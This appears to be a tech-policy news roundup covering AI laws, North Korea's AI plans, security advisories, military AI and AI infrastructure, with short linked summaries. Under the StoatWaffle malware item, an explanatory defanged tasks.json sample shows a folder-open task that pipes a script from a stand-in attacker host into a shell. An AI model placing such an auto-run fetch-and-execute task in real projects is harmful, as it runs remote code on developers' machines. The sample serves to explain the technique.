Governance, Regulation, and Legislation
ITU to host AI for Good Global Summit in Geneva
(DigWatch) The International Telecommunication Union (ITU) will organise the AI for Good Global Summit from 7 to 10 July 2026 at Palexpo in Geneva, Switzerland, according to an official announcement by the Swiss authorities. On 6 and 7 July, the United Nations Global Dialogue on AI Governance will take place ahead of the summit. The dialogue is convened within the framework of a UN General Assembly resolution and will bring together policymakers, experts, and representatives of civil society to discuss approaches to AI governance. – https://dig.watch/updates/itu-to-host-ai-for-good-global-summit-in-geneva
Data watchdogs seek safeguards in biotech law
(DigWatch) The European Data Protection Board and the European Data Protection Supervisor have issued a joint opinion on the proposed European Biotech Act. Both bodies support efforts to streamline biotech regulation and modernise clinical trial rules. Regulators welcome plans to harmonise the application of the Clinical Trials Regulation and create a single legal basis for processing personal data in trials. Greater legal clarity for sponsors and investigators is seen as a key benefit. – https://dig.watch/updates/data-watchdogs-seek-safeguards-in-biotech-law
AI-EFFECT builds EU testing facility for AI in critical energy infrastructure
(DigWatch) As Europe moves towards its climate-neutrality goals, integrating AI into energy systems is being presented as a way to improve efficiency, resilience, and sustainability. The EU-funded AI-EFFECT project is developing a European testing and experimentation facility (TEF) to support the development and adoption of AI solutions for the energy industry while ensuring safety, reliability, and compliance with EU regulations. The TEF is described as a virtual network linking existing laboratories and computing resources across several EU countries. It is designed to provide standardised testing environments, risk and certification workflows, and replicable methods for developing, testing, and validating AI applications for critical energy infrastructures under diverse, real-world conditions. – https://dig.watch/updates/ai-effect-eu-energy-ai-testing-facility
UK pushes platforms to tackle AI abuse and online violence against women
(DigWatch) The Department for Science, Innovation and Technology has called on online service providers to strengthen measures against digital harms targeting women and girls, as part of a commitment to halve such violence within a decade. In a letter published on 23 March 2026, Liz Kendall outlined expectations for platforms operating under the Online Safety Act. The letter states that the government has strengthened criminal law and regulatory frameworks, including new offences related to harmful pornographic practices and intimate image abuse. – https://dig.watch/updates/uk-pushes-platforms-to-tackle-ai-abuse-and-online-violence-against-women
Scotland sets up national AI agency
(DigWatch) The Scottish government has launched a dedicated national agency to drive AI strategy and support local tech companies. Leaders say this effort could help boost the economy and establish the nation as a hub for AI development. Scotland’s strategy highlights existing tech firms and data projects, including plans for major computing campuses and partnerships with global technology companies. Several research institutions and supercomputing initiatives are contributing to innovation. – https://dig.watch/updates/scotland-sets-up-national-ai-agency
Social media ban in Ecuador targets youth crime recruitment
(DigWatch) A proposal to restrict minors’ online activity is gaining momentum in Ecuador, where lawmakers are considering a social media ban for children under 15 as part of a broader response to rising organised crime. Under discussion in the National Assembly, the initiative introduced by Assembly member Katherine Pacheco Machuca would amend the Code of Childhood and Adolescence to block access to platforms enabling public interaction, content sharing, and messaging. The proposal defines social networks broadly, covering services that allow users to create accounts, connect with others, and exchange content. – https://dig.watch/updates/ecuador-social-media-ban
India’s AI Middle Path Offers Lessons for Australia and New Zealand
(Archana Atmakuri – Tech Policy Press) Global debates about artificial intelligence are increasingly focused on how to close the “AI divide” between countries that build advanced systems and those that largely consume them. Recent gatherings such as the India AI Impact Summit in New Delhi have highlighted this shift, with leaders debating how AI can be developed and governed in the Global South rather than relying solely on models emerging from Washington, Brussels or Beijing. While the ‘Global South’ framing often focuses on countries in Africa, Latin America and Asia, these debates also hold up a mirror for middle powers in Oceania such as Australia and New Zealand. For Canberra and Wellington, AI is still mostly treated as a technical and regulatory problem: something to be managed with principles, risk frameworks and standards. That is necessary, but it is not enough to create a national advantage. As AI becomes basic infrastructure for economies and societies, middle powers face a harder question: do they remain passengers in someone else’s AI ecosystem, or invest in becoming architects of their own? The answer does not lie in trying to out-spend the United States or the European Union, or to out-scale China. It lies in a middle path that puts sovereignty first: treating key AI capabilities as public infrastructure, grounding governance in local data rules, and centering the voices of affected communities. What would such a middle path look like for Australia and New Zealand? – https://www.techpolicy.press/indias-ai-middle-path-offers-lessons-for-australia-and-new-zealand/
Vietnam’s New AI Law Balances Innovation Push With Tight State Control
(Lam Le – Tech Policy Press) On March 1, Vietnam became the first country in Southeast Asia to have a comprehensive AI law come into effect. The Law on Artificial Intelligence draws on preceding legislation, notably the EU’s AI Act, which includes risk-based management of AI. It also “ensures a higher safety level than South Korea’s basic framework, (and) promotes strong development like Japan,” Tran Van Son, deputy director of the National Institute of Digital Technology and Digital Transformation under the Ministry of Science and Technology, said at a press conference last December. The law came into effect at a time when Hanoi is pushing for the “era of national rise,” a term coined by Communist Party chief To Lam in 2024 to reflect his vision for a high-income developed Vietnam by 2045. Technology is among the main engines of this transformation, while efficient institutions act both as facilitators of growth and as brakes to ensure digital sovereignty, safety and security in the digital space. This vision has translated into multiple tech-related laws and directives passed and updated in quick succession since 2024, including the Personal Data Protection Law, which came into effect last January, and the revised Cybersecurity Law passed last December. – https://www.techpolicy.press/vietnams-new-ai-law-balances-innovation-push-with-tight-state-control/
America’s AI Governance Crisis Is a Democracy Crisis
(Laura MacCleery – Tech Policy Press) On Friday, the White House released its national framework for artificial intelligence, which urges Congress to preempt state laws, avoid any new regulatory body, and shield developers from liability. It arrives amidst a nearly 300-page draft bill from Sen. Marsha Blackburn (R-Tenn.) and expected legislation from Rep. Jay Obernolte (R-Calif.), chair of the House AI Task Force, who has said he is working on a bill on preemption. The conventional reading has been that AI regulation is hard, technology moves too fast, lawmakers lack technical expertise, and encouraging innovation requires doing nothing to get in the way. That reading is wrong. What we are witnessing is not just a failure to govern AI. It is the predictable outcome of a decades-long project to dismantle the democratic infrastructure that would make governance possible. The industry and its allies have been preparing this ground for decades, but it’s now inescapable. Colorado’s landmark AI Act, the first comprehensive state law of its kind, was just stripped down to the studs. Gone are the duty of care—a common standard in product liability—the ban on algorithmic discrimination, and the impact assessments. More than 150 industry lobbyists apparently worked to gut the new law. State Sen. Julie Gonzales (D-34) said on the Senate floor that “[a]ll 35 of us in this building know that we too have witnessed the stunning brunt of AI leverage.” – https://www.techpolicy.press/americas-ai-governance-crisis-is-a-democracy-crisis/
Trump and GOP Lawmakers Push for New National AI Legislation
(Ben Lennett – Tech Policy Press) The Trump administration unveiled a new National AI Legislative Framework, outlining its preferred approach to establish a unified federal standard for artificial intelligence governance. The framework calls for new protections spanning children, intellectual property and energy costs, while also enacting a sweeping federal preemption of state AI laws. The announcement comes as the White House and Republicans in Congress are also moving to translate this framework into legislation. One new proposal led by Sen. Marsha Blackburn (R-Tenn.), dubbed the “TRUMP AMERICA AI Act,” attempts to overcome prior congressional resistance, including from Republicans, by weaving together protections for children, intellectual property and conservative speech alongside its state preemption measures. The act is being framed as a solution to protect the “4 Cs” previously coined by influential conservative operative Mike Davis, “children, creators, conservatives, and communities,” while ensuring “American AI companies can innovate without cumbersome regulation.” This renewed push follows the unsuccessful effort, led by Sen. Ted Cruz (R-Texas) last year, to pass a 10-year moratorium on states enforcing their own AI laws. After the measure passed the House in July, the Senate voted 99-1 to drop a version of the moratorium that was inserted into a budget reconciliation bill. Following that legislative defeat, President Donald Trump signed an executive order in December to target state AI regulations. The order charged the Department of Justice with developing a task force to challenge state AI laws and directed the Commerce Department to build a target list of “onerous” state regulations that hamper innovation, among other measures. And it tasked Congress with passing a “minimally burdensome national standard” that would “forbid” conflicting state AI laws.
GOP congressional leadership and Blackburn are among those now seeking to codify the White House’s wishes into legislative text, hoping it can make it through Congress. – https://www.techpolicy.press/trump-and-gop-lawmakers-push-for-new-national-ai-legislation/
Geostrategies
Assessing North Korea’s AI ambitions
(Lami Kim – IISS) The final report of North Korea’s 9th Party Congress outlined ambitious plans to integrate artificial intelligence (AI) into both its civilian and military sectors over the next five years. On the civilian side, the report stressed the urgent need to develop AI alongside energy and space technologies, describing them as core technologies underpinning advanced industrial development. For the military, it identified AI-enabled uninhabited attack systems as a key modernisation objective, alongside electronic-warfare and counterspace capabilities, while maintaining North Korea’s traditional emphasis on nuclear weapons. Pyongyang’s emphasis on AI is not new. North Korean media has repeatedly highlighted the potential impact of AI on both economic development and military modernisation, and its efforts to operationalise the technology. The regime has claimed that it has developed AI-equipped autonomous reconnaissance and attack uncrewed aerial vehicles (UAVs) and that its guided multiple rocket launchers incorporate AI-guidance systems. These developments reflect a recognition that its principal adversaries – the United States and South Korea – are increasingly integrating AI into their military operations and that North Korea cannot afford to fall behind in this emerging technological competition. – https://www.iiss.org/online-analysis/online-analysis/2026/03/assessing-north-koreas-ai-ambitions/
Security and Surveillance
Citrix NetScaler critical flaw could leak data, update now
(Pierluigi Paganini – Security Affairs) Citrix issued security updates for two NetScaler vulnerabilities, including a critical memory overread, tracked as CVE-2026-3055 (CVSS score of 9.3), that allows unauthenticated attackers to leak sensitive data. CVE-2026-3055 stems from insufficient input validation leading to a memory overread; it can be triggered only when Citrix ADC or Citrix Gateway is configured as a SAML IdP. – https://securityaffairs.com/189908/security/citrix-netscaler-critical-flaw-could-leak-data-update-now.html
North Korea-linked threat actors abuse VS Code auto-run to spread StoatWaffle malware
(Pierluigi Paganini – Security Affairs) North Korea-linked threat actor Team 8, behind the Contagious Interview campaign, is spreading StoatWaffle malware through malicious Microsoft Visual Studio Code projects. Since late 2025, the group has abused the “tasks.json” auto-run feature in Microsoft Visual Studio Code to execute code whenever a folder is opened, downloading payloads from the web across operating systems, making this tactic both stealthy and effective. “In Contagious Interview campaign, Team 8 has been mainly using OtterCookie. Starting around December 2025, Team 8 started using new malware. We named this malware StoatWaffle.” reads the report published by NTT Security. “Team 8 leverages a project related to blockchain as a decoy. This malicious repository contains .vscode directory that contains tasks.json file. If a user opens and trusts this malicious repository with VSCode, it reads this tasks.json file.” – https://securityaffairs.com/189880/security/north-korea-linked-threat-actors-abuse-vs-code-auto-run-to-spread-stoatwaffle-malware.html
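For context, the auto-run behaviour being abused is a documented VS Code feature: a task whose `runOptions.runOn` is set to `folderOpen` executes as soon as the user opens and trusts the folder, with no build or run action required. A defanged sketch of what such a malicious `tasks.json` could look like (the label, command, and URL below are illustrative, not taken from the actual campaign):

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "update dependencies",
      "type": "shell",
      "command": "curl -fsSL https://attacker.example/payload.sh | sh",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

Because the task fires on folder open, VS Code's workspace-trust prompt is effectively the only gate between cloning a decoy repository and executing the attacker's command.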
Enterprise Cybersecurity Software Fails 20% of the Time, Warns Absolute Security
(Danny Palmer – Infosecurity Magazine) Endpoint cybersecurity software fails to protect one in five enterprise devices, leaving organizations vulnerable to cyber threats, research by Absolute Security has warned. This protection gap means that organizations face the equivalent of 76 days a year in which they’re providing cybercriminals with increased access to their network, potentially leading to data breaches and downtime. The findings come from Absolute Security’s 2026 Resilience Risk Index. The report, published on March 23, is based on analysis of device-level telemetry across tens of millions of enterprise endpoints, which have been validated as using endpoint management and cybersecurity software. Christy Wyatt, president and CEO of Absolute Security, commented, “Cyber-attacks are inevitable, downtime is optional.” “The cybersecurity industry has rushed to provide innovations that detect and prevent threats, unfortunately it’s lagging when it comes to ensuring that tools can remain operational when they are needed most,” she added. – https://www.infosecurity-magazine.com/news/cybersecurity-software-failure-20/
Defence, Intelligence, and Warfare
How Iran, Anthropic-DoD Dispute Show the Need for Protective AI
(Chris Rogers – Just Security) U.S. and Israeli attacks on Iran mark yet another escalation in a period of rapidly expanding U.S. military activity stretching from Yemen and Nigeria to the Caribbean, Venezuela, and now direct confrontation with Tehran. These operations are unfolding at a moment when AI is increasingly embedded into military operations, including in Iran, from intelligence analysis and operational planning to target development and decision-support. At the same time, a public rupture between the U.S. Department of Defense and Anthropic—one of the few AI developers that attempted to place guardrails on military use of its models—has thrown the stakes of the military AI debate into sharp relief. These developments are not unrelated. Together, they point to a fundamental imbalance in current military AI: investment, institutional attention, and partnership incentives are disproportionately skewed toward “maximum lethality,” speed, and operational scale, while AI capabilities that ensure international humanitarian law (IHL) compliance, or that could strengthen civilian protection, remain de-prioritized and underfunded. – https://www.justsecurity.org/134321/iran-anthropic-dod-protective-ai/
Frontiers
Terafab initiative from Elon Musk targets AI and space computing
(DigWatch) Elon Musk unveiled his ambitious Terafab project in Austin, describing it as the ‘most epic chip-building exercise in history.’ The initiative, led by Tesla, xAI, and SpaceX, aims to produce 1 trillion watts of compute power annually, much of it intended for space applications. The project will start with a state-of-the-art semiconductor manufacturing facility in Austin, supporting AI development, humanoid robotics, and space data centres. Musk highlighted current supply chain limitations, stating that building Terafab is essential to secure the chips his companies need. – https://dig.watch/updates/terafab-musk-targets-ai-and-space-computing
AI and the End of Territorial Time
(Eli Lehrer – Tech Policy Press) The arc of human technological progress can be described as a long campaign against the limits imposed by time. Paleolithic humans stole a few uncertain hours from the night with smoky fires. Gaslight stretched the evening further. Railroads and ocean navigation forced continents to agree on the hour. Electricity turned night into a simulacrum of day. These shifts matter because historians of deep structural change rarely begin with ideology or politics but look instead to daily rhythms. When societies reorganize how people mark and measure a day, deeper transformations follow. After the Black Death, English laborers began treating time itself as something that could be bought and sold. The Second Industrial Revolution demanded precision to the minute, disciplining life to factory clocks, school schedules, and centralized grids. Now a global digital network infused with artificial intelligence may inaugurate another chapter—not by simply extending the day or demanding finer synchronization, but by altering the relationship between time and geography that has structured human life. Territorial time is losing authority as time zones matter less for participation: Even before the pandemic, one major study of an international firm showed that over 40 percent of meetings took place outside of at least one person’s normal business hours. Responsiveness drifts toward the instantaneous, even when interaction is asynchronous. And physical presence, though far less necessary for coordination, may be reemerging as a signal of authenticity. Together, these developments suggest the outlines of a new temporal order. – https://www.techpolicy.press/ai-and-the-end-of-territorial-time/
Anthropic outlines AI agent workflows for scientific computing
(DigWatch) Anthropic has published a post describing how AI agents can be used in multi-day coding workflows for well-scoped, measurable scientific computing tasks that do not require constant human supervision. In the article, Anthropic researcher Siddharth Mishra-Sharma explains how tools such as progress files, test oracles, and orchestration methods can be used to manage long-running software work. – https://dig.watch/updates/anthropic-ai-agents-scientific-computing
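The building blocks the post names — a progress file the agent checkpoints to between sessions, and a test oracle that objectively verifies each step — can be sketched in a few lines of Python. All names and the control flow below are illustrative assumptions, not a structure prescribed by Anthropic's article:

```python
import json
from pathlib import Path

# Hypothetical checkpoint file: persists completed work across agent sessions.
PROGRESS = Path("progress.json")

def load_progress():
    # Resume from the last recorded state, or start fresh.
    if PROGRESS.exists():
        return json.loads(PROGRESS.read_text())
    return {"completed": []}

def run_step(step):
    # Stand-in for the actual long-running work an agent would perform.
    return f"{step}-done"

def oracle(step, result):
    # A test oracle: an objective pass/fail check the agent cannot game.
    # Here just a stand-in predicate; in practice, a test suite or metric.
    return result == f"{step}-done"

def drive(steps):
    state = load_progress()
    for step in steps:
        if step in state["completed"]:
            continue  # already verified in an earlier session, skip it
        result = run_step(step)
        if oracle(step, result):
            # Only record steps the oracle accepts, then checkpoint to disk.
            state["completed"].append(step)
            PROGRESS.write_text(json.dumps(state))
        else:
            break  # stop so the next session (or a human) can inspect the failure
    return state["completed"]
```

The point of the pattern is that a crashed or interrupted session loses at most one step: the next run reloads `progress.json` and continues from the last oracle-verified checkpoint.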
NVIDIA introduces infrastructure-level security model for autonomous AI agents
(DigWatch) OpenShell, an open-source runtime introduced by NVIDIA, is designed to support the secure deployment of autonomous AI agents within enterprise environments. According to NVIDIA, OpenShell applies security controls at the infrastructure level rather than within the model or application layer. The runtime ensures that each agent operates inside an isolated sandbox, where system-level policies define and enforce permissions, resource access, and operational constraints. – https://dig.watch/updates/nvidia-introduces-infrastructure-level-security-model-for-autonomous-ai-agents
Corning licenses new ferrule technology to boost AI data centre fibre density
(DigWatch) Corning has expanded its data centre connectivity portfolio through a licensing agreement with US Conec, gaining access to PRIZM TMT optical ferrule technology designed to increase fibre density within data centre environments, particularly for AI infrastructure. The move reflects the growing pressure on data centre operators to handle higher connection densities as AI workloads scale and cluster architectures become more demanding. – https://dig.watch/updates/corning-licenses-new-ferrule-technology-to-boost-ai-data-centre-fibre-density